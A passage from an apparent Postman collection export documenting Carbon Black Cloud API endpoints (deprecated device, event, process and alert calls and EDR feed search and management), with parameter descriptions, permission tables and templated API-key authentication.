hostname</p>\n","type":"text/plain"},"key":"hostNameExact","value":""},{"disabled":true,"description":{"content":"<p>filter on owner name case insensitive</p>\n","type":"text/plain"},"key":"ownerName","value":""},{"disabled":true,"description":{"content":"<p>same as ownerName but with case sensitivity</p>\n","type":"text/plain"},"key":"ownerNameExact","value":""},{"disabled":true,"description":{"content":"<p>filter on events generated by a device with a given external or internal IP address</p>\n","type":"text/plain"},"key":"ipAddress","value":""},{"disabled":true,"description":{"content":"<p>filter on events generated by a process with the given SHA-256 hash</p>\n","type":"text/plain"},"key":"sha256Hash","value":""},{"disabled":true,"description":{"content":"<p>filter on events generated by a process with the given application name</p>\n","type":"text/plain"},"key":"applicationName","value":""},{"disabled":true,"description":{"content":"<p>filter on events with a given event type</p>\n","type":"text/plain"},"key":"eventType","value":""},{"description":{"content":"<p>filter on events generated within a given relative time frame</p>\n","type":"text/plain"},"key":"searchWindow","value":"3h"},{"disabled":true,"description":{"content":"<p>YYYY-MM-DD</p>\n","type":"text/plain"},"key":"startTime","value":""},{"disabled":true,"description":{"content":"<p>YYYY-MM-DD</p>\n","type":"text/plain"},"key":"endTime","value":""},{"disabled":true,"key":"rows","value":"10"},{"disabled":true,"key":"start","value":"0"}],"variable":[]}},"response":[],"_postman_id":"7d7c5335-7fd1-40f8-ad39-a877f44c47fd"},{"name":"⚠️ Get details for a Specific Event","id":"c0f21461-7c3b-4530-85a8-e5e845a33a44","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/event/{{cb_event_id}}","description":"<blockquote>\n<p>⚠️ This enpoint is being deprecated. Please use <strong>ThreatHunter</strong> &gt; <strong>Process Search v2</strong> as that will eventually become a <strong>Platform Search</strong> API covering both NGAV and EDR.</p>\n</blockquote>\n<hr />\n<p>Retrieve details for an individual event given the <code>event_id</code>. Note that only events associated with incidents/notifications/alerts will be visible through this API. Other event IDs will return HTTP 404 (Object Not Found).</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#get-details-for-a-specific-event\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","event","{{cb_event_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c0f21461-7c3b-4530-85a8-e5e845a33a44"},{"name":"⚠️ Find Processes","id":"826b0330-b786-4fc6-b38f-0f557227ad96","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/process","description":"<blockquote>\n<p>⚠️ This enpoint is being deprecated. Please use <strong>ThreatHunter</strong> &gt; <strong>Process Search v2</strong> as that will eventually become a <strong>Platform Search</strong> API covering both NGAV and EDR.</p>\n</blockquote>\n<hr />\n<p>Queries all events using input search criteria and returns a list of processes. Response is a list of processes in JSON format.</p>\n<p>Query parameters can be used to filter the list of processes:</p>\n<ul>\n<li><strong>hostName</strong>: filter on the hostname. For example, <code>hostName=WIN-IA9NQ1GN8OI</code> will return devices with case insensitive (partial match) hostname such as <code>WIN-IA9NQ1GN8OI</code> or <code>win-IA9NQ1GN8OI</code></li>\n<li><strong>hostNameExact</strong>: filter on the exact hostname. For example <code>hostName=WIN-IA9NQ1GN8OI</code> will only return devices with the exact hostname <code>WIN-IA9NQ1GN8OI</code> but not a host named <code>win-IA9NQ1GN8OI</code></li>\n<li><strong>ownerName</strong>: filter on owner name case insensitive (partial match).</li>\n<li><strong>ownerNameExact</strong>: same as <code>ownerName</code> but with case sensitivity</li>\n<li><strong>ipAddress</strong>: filter on events generated by a device with a given external or internal IP address</li>\n<li><strong>sha256Hash</strong>: filter on process's sha256 hash</li>\n<li><strong>applicationName</strong>: filter on process's application name</li>\n<li><strong>rows</strong>: limits the result to a specified number of rows (default=100 max=5000)</li>\n<li><strong>searchWindow</strong>: filter on events generated within a given relative time frame. Note that the default is one day if a <code>searchWindow</code> is not specified. Note that events may not be available past 30 days due to retention policies. Maximum search window is two weeks. Example values are:<ul>\n<li><code>3h</code> for the past four days</li>\n<li><code>1d</code> for the past two weeks</li>\n</ul>\n</li>\n<li><strong>startTime</strong> / <strong>endTime</strong>: Using a combination of <code>startTime</code> and <code>endTime</code> filters events for the given absolute timeframe.<ul>\n<li><code>startTime</code> and <code>endTime</code> must be used together</li>\n<li>The timestamps are in RFC3339 format. For example, <code>startTime=2017-11-15</code>, <code>endTime=2017-11-16</code></li>\n<li><code>endTime</code> - startTime must be &lt;= 1d</li>\n<li>Events may not be available past 30 days due to retention policies.</li>\n</ul>\n</li>\n</ul>\n<blockquote>\n<p><strong>Note:</strong> at least one or more of the following filters are required: <code>ownerName</code>, <code>ownerNameExact</code>, <code>hostName</code>, <code>hostNameExact</code>, <code>ipAddress</code>, <code>sha256Hash</code>, or <code>applicationName</code></p>\n</blockquote>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#find-processes\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","process"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>filter on the hostname</p>\n","type":"text/plain"},"key":"hostName","value":""},{"disabled":true,"description":{"content":"<p>filter on the exact hostname</p>\n","type":"text/plain"},"key":"hostNameExact","value":""},{"disabled":true,"description":{"content":"<p>filter on owner name case insensitive (partial match)</p>\n","type":"text/plain"},"key":"ownerName","value":""},{"disabled":true,"description":{"content":"<p>same as ownerName but with case sensitivity</p>\n","type":"text/plain"},"key":"ownerNameExact","value":""},{"disabled":true,"description":{"content":"<p>filter on events generated by a device with a given external or internal IP address</p>\n","type":"text/plain"},"key":"ipAddress","value":""},{"disabled":true,"description":{"content":"<p>filter on process's sha256 hash</p>\n","type":"text/plain"},"key":"sha256Hash","value":""},{"disabled":true,"description":{"content":"<p>filter on process's application name</p>\n","type":"text/plain"},"key":"applicationName","value":""},{"disabled":true,"description":{"content":"<p>limits the result to a specified number of rows</p>\n","type":"text/plain"},"key":"rows","value":""},{"disabled":true,"description":{"content":"<p>filter on events generated within a given relative time frame</p>\n","type":"text/plain"},"key":"searchWindow","value":"1w"},{"disabled":true,"description":{"content":"<p>filter events for the given absolute timeframe</p>\n","type":"text/plain"},"key":"startTime","value":""},{"disabled":true,"description":{"content":"<p>filter events for the given absolute timeframe</p>\n","type":"text/plain"},"key":"endTime","value":""}],"variable":[]}},"response":[],"_postman_id":"826b0330-b786-4fc6-b38f-0f557227ad96"},{"name":"⚠️ Get Details on Alert","id":"926c751a-0eaa-4d7b-aa5d-33ba62f91981","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/alert/{{cb_alert_id}}","description":"<blockquote>\n<p>⚠️ This API is being deprecated.\nYou may continue to access the documentation below until the Alerts v3 API is deprecated. The most up to date documentation for Alerts v6 is available <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">here</a>.</p>\n</blockquote>\n<p>Only API keys of type “API” can call the alerts API.</p>\n<p>Get details on the events that led to an alert. This includes retrieving metadata around the alert as well as a list of all the events associated with the alert. Introduced in 0.21.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/#get-details-on-alert\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","alert","{{cb_alert_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"926c751a-0eaa-4d7b-aa5d-33ba62f91981"},{"name":"⚠️ Bulk Sensor Data Retrieval","id":"29bf53f0-5d58-4ad2-bea5-7df5c4ab57ef","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/device/all?fileFormat=","description":"<blockquote>\n<p>⚠️ This API has been deprecated.<br />You may continue to access the documentation for Devices v3 here. The most up to date documentation for Devices v6 is available <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api\">here</a>.</p>\n</blockquote>\n<p>This single request will retrieve all Carbon Black Cloud Sensor Details in either CSV or JSON format. There is currently a limitation of 100k records even using this new API call. Without using the above API calls there is a hard limit of 5k rows per call built into the API even using pagination parameters, and a maximum of 15k records can be returned.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/cb-defense/1/rest-api/#bulk-sensor-data-retrieval\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","device","all"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>This can be set to ‘csv’ or ‘json’ for the corresponding format type</p>\n","type":"text/plain"},"key":"fileFormat","value":""}],"variable":[]}},"response":[],"_postman_id":"29bf53f0-5d58-4ad2-bea5-7df5c4ab57ef"},{"name":"⚠️ Device Status","id":"0037b24e-c18d-45bf-a937-ac0257a1d77b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/device","description":"<blockquote>\n<p>⚠️ This API has been deprecated.\nYou may continue to access the documentation for Devices v3 here. The most up to date documentation for Devices v6 is available <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api\">here</a>.</p>\n</blockquote>\n<p>Get a status of all devices. The response will be in json format.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/cb-defense/1/rest-api/#device-status\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","device"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>filter on hostnames based on a case insensitive token search</p>\n","type":"text/plain"},"key":"hostName","value":""},{"disabled":true,"description":{"content":"<p>filter on the exact hostname</p>\n","type":"text/plain"},"key":"hostNameExact","value":""},{"disabled":true,"description":{"content":"<p>filter on owner name case insensitively</p>\n","type":"text/plain"},"key":"ownerName","value":""},{"disabled":true,"description":{"content":"<p>same as ownerName but with case sensitivity</p>\n","type":"text/plain"},"key":"ownerNameExact","value":""},{"disabled":true,"description":{"content":"<p>filter on devices with a given external or internal IP address</p>\n","type":"text/plain"},"key":"ipAddress","value":""}],"variable":[]}},"response":[],"_postman_id":"0037b24e-c18d-45bf-a937-ac0257a1d77b"},{"name":"⚠️ Get Status of Individual Device","id":"d0c6c24b-0b51-42c1-bf69-a7facd981efb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/integrationServices/v3/device/{{cb_device_id}}","description":"<blockquote>\n<p>⚠️ This API has been deprecated.\nYou may continue to access the documentation for Devices v3 here. The most up to date documentation for Devices v6 is available <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api\">here</a>.</p>\n</blockquote>\n<p>Retrieve details for an individual device given the <code>device_id</code>.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/cb-defense/1/rest-api/#get-status-of-individual-device\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","device","{{cb_device_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"d0c6c24b-0b51-42c1-bf69-a7facd981efb"},{"name":"⚠️ Change Status of an Individual Device","id":"c557bfd3-50c8-4309-9234-0da53a52b01d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PATCH","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"policyName\": \"Restrictive_Windows_Workstation\"\n}"},"url":"{{cb_url}}/integrationServices/v3/device/{{cb_device_id}}","description":"<blockquote>\n<p>⚠️ This API has been deprecated.<br />You may continue to access the documentation for Devices v3 here. The most up to date documentation for Devices v6 is available <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/devices-api\">here</a>.</p>\n</blockquote>\n<p>Change status of an individual device by its <code>device_id</code>. The current revision of the Carbon Black Cloud backend only allows one element to be changed with this call: the security policy assigned to the device.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/cb-defense/1/rest-api/#change-status-of-an-individual-device\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":true,"source":{"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","name":"Deprecated","type":"folder"}},"urlObject":{"path":["integrationServices","v3","device","{{cb_device_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c557bfd3-50c8-4309-9234-0da53a52b01d"}],"id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"}]},"isInherited":false},"_postman_id":"c1df5a05-bb03-405a-9ebb-95736baf04fa","description":""}],"id":"0b2f1877-345e-4555-999b-721c1bd75be8","description":"<h2 id=\"introduction\">Introduction</h2>\n<p>Carbon Black Cloud Endpoint Standard is an endpoint protection platform that consolidates security in the cloud using a single agent, console and data set.</p>\n<h2 id=\"getting-started\">Getting Started</h2>\n<p>The Carbon Black Cloud API lets you query enrollment and event data for your <a href=\"https://www.vmware.com/products/carbon-black-cloud.html\">Carbon Black Cloud</a> organization. The APIs either use HTTP GET or POST requests with JSON requests and responses. To get started you need to obtain an API key and API Secret from your Carbon Black Cloud console. Once you have the API key and secret, you are ready to start using the APIs.</p>\n<h2 id=\"more-information\">More Information</h2>\n<p>*   Authentication: <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/authentication/\">https://developer.carbonblack.com/reference/carbon-black-cloud/authentication/</a>\n*   Endpoint Standard APIs: <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/\">https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/</a></p>\n","event":[{"listen":"prerequest","script":{"id":"3bf53273-6766-4b73-96a1-a7e9d58ae0d8","type":"text/javascript","exec":[""]}},{"listen":"test","script":{"id":"62468ae0-5515-405e-ba75-21f4648260e1","type":"text/javascript","exec":[""]}}],"_postman_id":"0b2f1877-345e-4555-999b-721c1bd75be8","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Enterprise EDR API (EDR) 🗝","item":[{"name":"Feed Search API","item":[{"name":"Health Check","id":"a13619f1-00c1-4aea-a8d6-d600d1c3eec7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/threathunter/feedsearch/v1/health_check","description":"<p>This endpoint does a simple health check.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>No Permissions Required</td>\n<td>N/A</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-search/#health-check\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedsearch","v1","health_check"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a13619f1-00c1-4aea-a8d6-d600d1c3eec7"},{"name":"Feed Search","id":"80429aff-b3a3-4730-8977-3ba842c4b1a6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/threathunter/feedsearch/v1/orgs/{{cb_org_key}}/search?query=","description":"<p>This endpoint provides free form search capability for feed reports.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-search/#feed-search\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedsearch","v1","orgs","{{cb_org_key}}","search"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>[required] Query to run</p>\n","type":"text/plain"},"key":"query","value":""},{"disabled":true,"description":{"content":"<p>Offset of first record</p>\n","type":"text/plain"},"key":"start","value":""},{"disabled":true,"description":{"content":"<p>Number of records to retrieve</p>\n","type":"text/plain"},"key":"rows","value":""},{"disabled":true,"description":{"content":"<p>Comma separated list of sort fields with optional asc/desc after each</p>\n","type":"text/plain"},"key":"sort","value":""},{"disabled":true,"description":{"content":"<p>Comma separated list of fields to compute facets for</p>\n","type":"text/plain"},"key":"facet.field","value":""}],"variable":[]}},"response":[],"_postman_id":"80429aff-b3a3-4730-8977-3ba842c4b1a6"},{"name":"Feed Field Suggest","id":"a00fcabe-c82a-4da8-a55b-7de68148751c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/feedsearch/v1/orgs/{{cb_org_key}}/suggest?suggest.query=","description":"<p>This endpoint returns field name suggestions based on a partial field substring with more likely field names weighted higher.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-search/#feed-field-suggest\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedsearch","v1","orgs","{{cb_org_key}}","suggest"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>[required] A substring of any field name</p>\n","type":"text/plain"},"key":"suggest.query","value":""},{"disabled":true,"description":{"content":"<p>The max number of suggestions to return</p>\n","type":"text/plain"},"key":"suggest.count","value":""}],"variable":[]}},"response":[],"_postman_id":"a00fcabe-c82a-4da8-a55b-7de68148751c"}],"id":"4af38d4f-d17a-416e-a5a9-b50c689e408c","_postman_id":"4af38d4f-d17a-416e-a5a9-b50c689e408c","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Feed Manager API","item":[{"name":"Get all Feeds","event":[{"listen":"test","script":{"exec":[""],"type":"text/javascript","id":"378d2ba1-8a62-4f49-9461-afbb9db7f611"}}],"id":"6991add3-cb98-41ab-9261-53fce7759d09","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds","description":"<p>Retrieve all feeds owned by the caller. Provide <code>include_public=true</code> parameter to also include public community feeds.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#get-all-feeds\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6991add3-cb98-41ab-9261-53fce7759d09"},{"name":"Get Specific Feed","event":[{"listen":"test","script":{"exec":["var required = ['cb_url', 'cb_org_key', 'cb_feed_id'];","for (var item in required) {","    if (!pm.environment.get(required[item])) { throw new Error(required[item] + ' Variable Not Set'); }    ","}",""],"type":"text/javascript","id":"84242d7a-7b72-41ad-8b2e-fca8983785ea"}}],"id":"999cccc2-024e-4687-8e32-78ae93161168","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/{{cb_feed_id}}","description":"<p>Retrieve feed with <code>feed_id</code>. This feed must be owned by the caller.get-report.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#get-specific-feed\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","{{cb_feed_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"999cccc2-024e-4687-8e32-78ae93161168"},{"name":"Create a New Private Feed","id":"23098a4c-370d-4ff3-b52d-cee1b4c5c683","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"feedinfo\": {\n        \"name\": \"Sample Feed\",\n        \"owner\": \"{{cb_org_key}}\",\n        \"provider_url\": \"https://sample-feed.com\",\n        \"summary\": \"A sample feed\",\n        \"category\": \"Partner\",\n        \"source_label\": null,\n        \"access\": \"private\"\n    },\n    \"reports\": [\n        {\n            \"id\": \"random-id-12345\",\n            \"timestamp\": 1776859436,\n            \"title\": \"This is a report\",\n            \"description\": \"Pretty sweet, huh?\",\n            \"severity\": 10,\n            \"link\": \"https://sample-feed.com/report-info\",\n            \"iocs\": {\n                \"md5\": [],\n                \"ipv4\": [\n                    \"10.16.3.12\"\n                ],\n                \"dns\": [\n                    \"screaminggoatpiano.com\",\n                    \"www.screaminggoatpiano.com\"\n                ]\n            }\n        }\n    ]\n}"},"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds","description":"<p>Create new private feed. Unique feed ID will be assigned by the service. All IOCs will be converted to IOC_V2. This feed will be owned by the caller. The feed will be available to only the org that created it.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.feeds</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#create-a-new-private-feed\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"23098a4c-370d-4ff3-b52d-cee1b4c5c683"},{"name":"⚠️ Create a New Public Feed","id":"45a9c3cf-e12f-45bd-877c-80118745e792","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\"feedinfo\": {\"name\": str*,\n \"owner\": str*,\n \"provider_url\": str*,\n \"summary\": str*,\n \"category\": str*,\n \"source_label\": str,\n \"access\": str,\n \"id\": str},\n \"reports\": [{\"id\": str*,\n \"timestamp\": int*,\n \"title\": str*,\n \"description\": str*,\n \"severity\": int*,\n \"link\": str,\n \"tags\": [str],\n \"iocs\": IOCs,\n \"iocs_v2\": [IOC_V2],\n \"visibility\": str}]}"},"url":"{{cb_url}}/threathunter/feedmgr/v2/orgs/{{cb_org_key}}/feeds/public","description":"<p>Create public feed. Unique feed ID will be assigned by the service. All IOCs will be converted to IOC_V2. This feed will be owned by the caller. The feed will be available to all organizations.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.feeds</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/feed-api/#create-a-new-public-feed\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","feedmgr","v2","orgs","{{cb_org_key}}","feeds","public"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"45a9c3cf-e12f-45bd-877c-80118745e792"},{"name":"Create a New Reserved 